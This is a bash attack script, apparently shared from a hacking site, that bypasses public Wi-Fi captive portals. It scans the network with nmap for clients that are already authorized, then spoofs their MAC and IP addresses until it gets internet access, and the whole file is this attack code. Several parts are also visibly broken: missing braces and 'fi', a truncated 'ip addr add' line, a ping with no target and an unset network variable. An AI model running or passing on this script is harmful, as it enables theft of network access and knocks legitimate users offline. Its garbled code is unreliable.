Hack Captive Mial

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/usr/bin/env bash
# =========================================================================== #
# FILE: hack-captive-mial.sh #
# USAGE: sudo ./hack-captive-mial.sh #
# #
# DESCRIPTION: This script helps to pass through the captive portals in #
# public Wi-Fi networks. It hijacks IP and MAC from somebody #
# who is already connected and authorized on captive portal. #
# Tested in Ubuntu 16.04 with different captive portals in #
# airports and hotels all over the world. #
# #
# REQUIREMENTS: coreutils, sipcalc, nmap #
# NOTES: Let the information always be free! #
# AUTHOR: Stanislav "systematicat" Kotivetc, <@systematicat> #
# COMPANY: Hire me! I am a cool dude! #
# VERSION: 1.0 #
# CREATED: 16.12.2016 - 23:59 #
# REVISION: --- #
# COPYRIGHT: 2016 Stanislav "systematicat" Kotivetc #
# =========================================================================== #
# FIX: MiAl (HackWare.ru) #
# =========================================================================== #

# Find the initial parameters of wireless interface.

interface="$(ip -o -4 route show to default | awk '/dev/ {print $5}' | head -n1)"
localip="$(ip -o -4 route get 1 | awk '/src/ {print $7}')"
wifissid="$(iw dev "$interface" link | awk '/SSID/ {print $NF}')"
gateway="$(ip -o -4 route show to default | awk '/via/ {print $3}')"
broadcast="$(ip -o -4 addr show dev "$interface" | awk '/brd/ {print $6}')"
ipmask="$(ip -o -4 addr show dev "$interface" | awk '/inet/ {print $4}')"
netmask="$(printf "%s\n" "$ipmask" | cut -d "/" -f 2)"
netaddress="$(sipcalc "$ipmask" | awk '/Network address/ {print $NF}')"
macaddress="$(ip -0 addr show dev "$interface" \
| awk '/link/ && /ether/ {print $2}' \
| tr '[:upper:]' '[:lower:]')"

# Check for running as root.

function check_sudo() {
if [[ "$EUID" -ne 0 ]]; then
printf "%b\n" "ERROR This script must be run as root. Use sudo." >&2
exit 1

# Create a temporary folder for script work.

function create_tmp() {
unset tmp
tmp="$(mktemp -q -d "${TMPDIR:-/tmp}/hackaptive_XXXXXXXXXX")" || {
printf "%b\n" "ERROR Unable to create temporary folder. Abort." >&2
exit 1

# Clean tmp/ on exit due to any reason.

function clean_up() {
rm -rf "$tmp"
trap 0

# Split up big networks into smaller chunks of /24.

function calc_network() {
printf "%b\n" "Exploring network in \"$wifissid\" Wi-Fi hotspot."
if [[ "$netmask" -lt 24 ]]; then
sipcalc -s 24 "$network" \
| awk '/Network/ {print $3}' > "$tmp"/networklist.$$.txt
printf "%b\n" "Splitting up network $network into smaller chunks."
printf "%s\n" "$network" | cut -d "/" -f 1 > "$tmp"/networklist.$$.txt

routermac="$(nmap -n -sn -PR -PS -PA -PU -T5 $gateway | grep -E -o '[A-Z0-9:]{17}'
| tr A-Z a-z)"

# Select network, set netmask, scan it for IP and MAC and hijack them. Repeat.
function main() {
while read -r networkfromlist; do
if [[ "$netmask" -lt 24 ]]; then

# Scan selected network for active hosts.

printf "%b\n" "Looking for active hosts in $network. Please wait."
nmap -n -sn -PR -PS -PA -PU -T5 --exclude "$localip","$gateway" "$network" \
| awk '/for/ {print $5} ; /Address/ {print $3}' \
| sed '$!N;s/\n/ - /' > "$tmp"/hostsalive.$$.txt

# Set founded IP and MAC for wireless interface.

while read -r hostline; do
newipset="$(printf "%s\n" "$hostline" | awk '{print $1}')"
newmacset="$(printf "%s\n" "$hostline" \
| awk '{print $3}' \
| tr '[:upper:]' '[:lower:]')"

if [ "$routermac" != "$newmacset" ]; then

printf "%b\n" "Trying to hijack $newipset - $newmacset"

ip link set "$interface" down
ip link set dev "$interface" address "$newmacset"
ip link set "$interface" up
ip addr flush dev "$interface"
ip addr add "$newipset/$netmask" broadcast "$broadcast" dev
ip route add default via "$gateway"
sleep 1

# Check if Google DNS pingable with our new IP and MAC.

ping -c1 -w1 >/dev/null
if [[ $? -eq 0 ]]; then
printf "%b\n" "Pwned! Now you can surf the Internet!"
exit 0
printf "%b\n" "Skipped $newipset - $newmacset"

done < "$tmp"/hostsalive.$$.txt

rm -rf "$tmp"/hostsalive.$$.txt
printf "%b\n" "Suitable hosts not found. Checking another network chunk."

done < "$tmp"/networklist.$$.txt

rm -rf "$tmp"/networklist.$$.txt
printf "%b\n" "No luck! Try again later or try another Wi-Fi hotspot."

# Restore original MAC and IP.

ip link set "$interface" down
ip link set dev "$interface" address "$macaddress"
ip link set "$interface" up
ip addr flush dev "$interface"
ip addr add "$ipmask" broadcast "$broadcast" dev "$interface"
ip route add default via "$gateway"

# Functions start here.

trap clean_up 0 1 2 3 15

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